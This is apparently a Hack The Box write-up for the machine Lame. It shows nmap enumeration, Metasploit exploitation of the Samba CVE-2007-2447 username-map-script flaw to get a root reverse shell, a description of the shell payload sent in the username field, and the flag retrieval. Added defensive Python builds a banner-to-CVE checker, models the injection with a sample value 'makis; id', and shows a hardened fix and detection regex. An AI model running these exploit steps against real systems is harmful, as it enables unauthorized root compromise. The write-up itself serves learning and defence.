Overview
Lame is one of the first machines on HTB and a classic entry point. The attack path is straightforward: an outdated Samba version exposes CVE-2007-2447, which allows unauthenticated remote code execution as root.
Enumeration
Start with an nmap scan covering all ports:
nmap -sC -sV -p- --min-rate 5000 -oN lame.nmap 10.10.10.3
Key findings:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios-ssn Samba smbd 3.X - 4.X
445/tcp open netbios-ssn Samba smbd 3.0.20
The Samba version 3.0.20 is the interesting one.
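Reading the banner against the affected range by hand works for one box; for a scan covering many hosts it is worth doing it in code. The following is an added example (not part of the original writeup) that parses the open-port lines of an nmap -oN report and checks each banner against a small watchlist built from the two advisories mentioned on this page: Samba 3.0.0 through 3.0.25rc3 for CVE-2007-2447 and vsftpd 2.3.4 for CVE-2011-2523. It goes slightly beyond the page by handling release-candidate ordering (3.0.25rc3 sorts before 3.0.25) and by reporting "unknown" when nmap can only guess a range such as "3.X - 4.X". The sample report is constructed from the key findings above, not a captured file.

```python
import re

# Constructed sample input: the open-port lines quoted above, wrapped in the
# header lines nmap normally writes. Not a captured file.
SAMPLE_NMAP = """\
# Nmap scan initiated as: nmap -sC -sV -p- --min-rate 5000 -oN lame.nmap 10.10.10.3
Nmap scan report for 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn Samba smbd 3.0.20
"""

# (banner prefix, first affected version, last affected version, advisory).
# The Samba range is the one quoted in the writeup. vsftpd 2.3.4 is the one
# release whose distributed tarball carried the backdoor, so a banner match is
# a lead to confirm, not proof: the page itself notes it was not triggered here.
WATCHLIST = [
    ("Samba smbd", "3.0.0", "3.0.25rc3", "CVE-2007-2447"),
    ("vsftpd", "2.3.4", "2.3.4", "CVE-2011-2523"),
]

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:rc(\d+))?")


def parse_version(text):
    """Turn '3.0.25rc3' into a sortable tuple, or None when the banner has no
    concrete version (nmap's '3.X - 4.X' guess, for instance)."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    # A release candidate sorts before the final release of the same number:
    # (..., 0, rcN) for a candidate, (..., 1, 0) for the final release.
    return (int(major), int(minor), int(patch or 0), 0 if rc else 1, int(rc or 0))


def parse_open_ports(report):
    """Yield (port, proto, service, version_banner) for each open-port line."""
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            yield int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()


def assess(report):
    """Match every banner against WATCHLIST. Verdicts:
    'affected'      concrete version inside the advisory's range
    'not affected'  concrete version outside the range
    'unknown'       product matched but nmap could not pin the version"""
    findings = []
    for port, proto, service, banner in parse_open_ports(report):
        for product, first, last, cve in WATCHLIST:
            if not banner.startswith(product):
                continue
            v = parse_version(banner[len(product):])
            if v is None:
                verdict = "unknown"
            elif parse_version(first) <= v <= parse_version(last):
                verdict = "affected"
            else:
                verdict = "not affected"
            findings.append({"port": port, "proto": proto, "product": product,
                             "banner": banner, "cve": cve, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_NMAP):
        print(f"{f['port']:>5}/{f['proto']}  {f['verdict']:<12} {f['cve']}  {f['banner']}")
```

On the sample above this flags 445 as affected, leaves 139 as unknown because the banner carries no version, and reports vsftpd on 21 as a lead worth confirming. Banner matching is a triage step only; a patched distribution build can keep the old version string, so an "affected" verdict still needs verification against the package's actual changelog.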
Foothold
CVE-2007-2447 — Samba username map script
Samba 3.0.0 through 3.0.25rc3 with the username map script option enabled allows RCE via shell metacharacters in the username field of an MS-RPC call.
Using Metasploit:
msfconsole -q
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.5
run
We get a root shell immediately — no privesc needed.
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Command shell session 1 opened
id
uid=0(root) gid=0(root)
Flags
# user flag
cat /home/makis/user.txt
# root flag
cat /root/root.txt
Notes
- vsftpd 2.3.4 also has a backdoor (CVE-2011-2523) but it wasn't triggered on this box.
- The Samba exploit works because the username is passed directly to /bin/sh via popen() without sanitization.
- Metasploit automates this, but the manual PoC sends nohup /bin/sh -c 'payload' in the username field via the MSRPC SESSION_SETUP_AND_X call.
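The root cause in the notes above (an attacker-controlled username spliced into a shell command line handed to popen()) is the generic command-injection pattern, and the fix is the same everywhere: never build a shell string from the value, pass it as a discrete argument instead, and reject anything outside a strict allowlist before it reaches the script at all. The following is an added example written for this page, not Samba's code and not Metasploit's: it models the flawed pattern as a string builder (returned, never executed) beside a hardened invocation, plus a small metacharacter check of the kind a log-review script could apply to usernames seen in SMB session setups. The script path /etc/samba/map.sh and the stand-in map script are hypothetical.

```python
import re
import shlex
import subprocess
import sys

# Hypothetical stand-in for a configured "username map script": it prints the
# one argument it received. Constructed for this example, not Samba's code.
MAP_SCRIPT_ARGV = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

# Characters that change the meaning of a command line under /bin/sh.
SHELL_META = re.compile(r"[`$;&|<>()\\'\"\n]")
# Allowlist for what a Unix account name should look like.
USERNAME_OK = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def unsafe_command_line(script, username):
    """Model of the flawed pattern described in the notes: the username is
    concatenated into a single string destined for /bin/sh. The string is only
    returned here so the problem can be inspected without executing anything."""
    return f"{script} {username}"


def quoted_command_line(script, username):
    """Second-best fix when a shell string cannot be avoided: shlex.quote wraps
    the value so the shell treats it as one literal word."""
    return f"{script} {shlex.quote(username)}"


def contains_shell_meta(username):
    """Detection helper: True if a username carries shell metacharacters, which a
    legitimate session setup has no reason to include."""
    return SHELL_META.search(username) is not None


def run_map_script_safe(username):
    """Hardened form: validate against the allowlist, then run the script with
    the username as its own argv element, so no shell ever parses it."""
    if not USERNAME_OK.match(username):
        raise ValueError(f"rejected username: {username!r}")
    proc = subprocess.run(MAP_SCRIPT_ARGV + [username],
                          capture_output=True, text=True, check=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    # A constructed, harmless sample name: the shell would run "id" as a second command.
    sample = "makis; id"
    print("unsafe :", unsafe_command_line("/etc/samba/map.sh", sample))
    print("quoted :", quoted_command_line("/etc/samba/map.sh", sample))
    print("flagged:", contains_shell_meta(sample))
    print("safe   :", run_map_script_safe("makis"))
```

The allowlist is the important control: quoting stops the shell from splitting the value, but it still lets arbitrary bytes reach the script, whereas the argv form with validation removes both the shell and the unexpected input. The same allowlist doubles as a detection rule over authentication logs, since a username that trips it is either a misconfigured client or an injection attempt.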